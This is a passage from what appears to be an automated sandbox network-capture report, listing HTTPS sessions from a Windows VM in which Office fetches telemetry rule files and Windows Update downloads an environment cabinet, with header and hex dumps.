                      2024-12-03 16:52:13 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                      Session IDSource IPSource PortDestination IPDestination Port
                      110192.168.2.64982813.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:13 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:13 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:13 GMT
                      Content-Type: text/xml
                      Content-Length: 1368
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                      ETag: "0x8DC582BDDC22447"
                      x-ms-request-id: e3ba4dff-401e-002a-1ea2-42c62e000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165213Z-174f7845968pght8hC1EWRyvxg000000098000000000u6kn
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:13 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                      Session IDSource IPSource PortDestination IPDestination Port
                      111192.168.2.64982913.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:13 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:14 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:13 GMT
                      Content-Type: text/xml
                      Content-Length: 1401
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                      ETag: "0x8DC582BE055B528"
                      x-ms-request-id: 340b88d8-401e-0064-2ede-4154af000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165213Z-174f7845968qj8jrhC1EWRh41s000000162000000000uh38
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:14 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                      Session IDSource IPSource PortDestination IPDestination Port
                      112192.168.2.64983013.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:14 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:14 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:14 GMT
                      Content-Type: text/xml
                      Content-Length: 1364
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                      ETag: "0x8DC582BE1223606"
                      x-ms-request-id: 8c7215b7-001e-00ad-4224-44554b000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165214Z-174f7845968psccphC1EWRuz9s00000016g000000000879g
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:14 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      113192.168.2.64983120.109.210.53443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:14 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=NyhtEpSE923+nrz&MD=EntUVEoZ HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                      Host: slscr.update.microsoft.com
                      2024-12-03 16:52:15 UTC560INHTTP/1.1 200 OK
                      Cache-Control: no-cache
                      Pragma: no-cache
                      Content-Type: application/octet-stream
                      Expires: -1
                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                      ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                      MS-CorrelationId: 2d370f7b-68ad-4e66-968a-10075de15ea3
                      MS-RequestId: 3dda6e28-ffa8-49f1-a144-5b0fb4dfbb4f
                      MS-CV: 5sodNr4K60iZeVy5.0
                      X-Microsoft-SLSClientCache: 1440
                      Content-Disposition: attachment; filename=environment.cab
                      X-Content-Type-Options: nosniff
                      Date: Tue, 03 Dec 2024 16:52:14 GMT
                      Connection: close
                      Content-Length: 30005
                      2024-12-03 16:52:15 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                      Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                      2024-12-03 16:52:15 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                      Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                      Session IDSource IPSource PortDestination IPDestination Port
                      114192.168.2.64983220.198.119.84443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:15 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 67 6a 66 38 73 6f 55 50 71 30 43 2b 33 46 6d 49 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 34 63 65 65 38 35 30 63 65 37 36 39 62 35 65 0d 0a 0d 0a
                      Data Ascii: CNT 1 CON 305MS-CV: gjf8soUPq0C+3FmI.1Context: 84cee850ce769b5e
                      2024-12-03 16:52:15 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                      Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                      2024-12-03 16:52:15 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 67 6a 66 38 73 6f 55 50 71 30 43 2b 33 46 6d 49 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 34 63 65 65 38 35 30 63 65 37 36 39 62 35 65 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 42 33 33 77 58 39 56 4c 44 37 43 76 62 50 53 6d 79 55 30 61 6f 64 4e 4e 46 38 4f 56 49 48 66 2f 43 6c 36 5a 43 41 71 66 65 4c 32 58 35 33 68 63 64 44 62 4e 6c 69 48 64 65 59 45 64 33 64 4e 58 69 79 43 44 77 4b 39 39 35 47 6a 52 55 57 4f 53 74 30 75 6e 6d 51 33 72 50 43 72 44 55 58 6a 4c 4a 56 56 50 56 32 48 70 42 56 63 32
                      Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: gjf8soUPq0C+3FmI.2Context: 84cee850ce769b5e<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARB33wX9VLD7CvbPSmyU0aodNNF8OVIHf/Cl6ZCAqfeL2X53hcdDbNliHdeYEd3dNXiyCDwK995GjRUWOSt0unmQ3rPCrDUXjLJVVPV2HpBVc2
                      2024-12-03 16:52:15 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 67 6a 66 38 73 6f 55 50 71 30 43 2b 33 46 6d 49 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 34 63 65 65 38 35 30 63 65 37 36 39 62 35 65 0d 0a 0d 0a
                      Data Ascii: BND 3 CON\QOS 56MS-CV: gjf8soUPq0C+3FmI.3Context: 84cee850ce769b5e
                      2024-12-03 16:52:15 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                      Data Ascii: 202 1 CON 58
                      2024-12-03 16:52:15 UTC58INData Raw: 4d 53 2d 43 56 3a 20 35 58 53 37 55 4f 2b 53 62 55 53 51 41 76 47 4d 61 39 4a 77 6a 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                      Data Ascii: MS-CV: 5XS7UO+SbUSQAvGMa9JwjA.0Payload parsing failed.


                      Session IDSource IPSource PortDestination IPDestination Port
                      115192.168.2.64983413.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:15 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:15 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:15 GMT
                      Content-Type: text/xml
                      Content-Length: 1360
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                      ETag: "0x8DC582BDDEB5124"
                      x-ms-request-id: 6c50be25-301e-003f-6fee-44266f000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165215Z-174f7845968cs2nkhC1EWR2tq000000001z0000000003u7q
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:15 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                      Session IDSource IPSource PortDestination IPDestination Port
                      116192.168.2.64983313.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:15 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:15 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:15 GMT
                      Content-Type: text/xml
                      Content-Length: 1397
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                      ETag: "0x8DC582BE7262739"
                      x-ms-request-id: f24b5158-501e-0047-6a59-43ce6c000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165215Z-174f78459685m244hC1EWRgp2c0000001640000000003umu
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:15 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                      Session IDSource IPSource PortDestination IPDestination Port
                      117192.168.2.64983613.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:15 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:16 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:15 GMT
                      Content-Type: text/xml
                      Content-Length: 1366
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                      ETag: "0x8DC582BDB779FC3"
                      x-ms-request-id: b7ec0bbd-e01e-0071-43ee-4408e7000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165215Z-174f7845968swgbqhC1EWRmnb400000016ag00000000hhar
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:16 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                      Session IDSource IPSource PortDestination IPDestination Port
                      118192.168.2.64983513.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:16 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:16 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:16 GMT
                      Content-Type: text/xml
                      Content-Length: 1403
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                      ETag: "0x8DC582BDCB4853F"
                      x-ms-request-id: 6e0e77ff-301e-0052-0b15-4165d6000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165216Z-174f7845968nxc96hC1EWRspw8000000161g000000002cb5
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:16 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                      Session IDSource IPSource PortDestination IPDestination Port
                      119192.168.2.64983713.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:16 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:17 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:16 GMT
                      Content-Type: text/xml
                      Content-Length: 1397
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                      ETag: "0x8DC582BDFD43C07"
                      x-ms-request-id: 0e5f614d-c01e-0066-48ee-44a1ec000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165216Z-174f7845968cpnpfhC1EWR3afc00000015y0000000001ha4
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
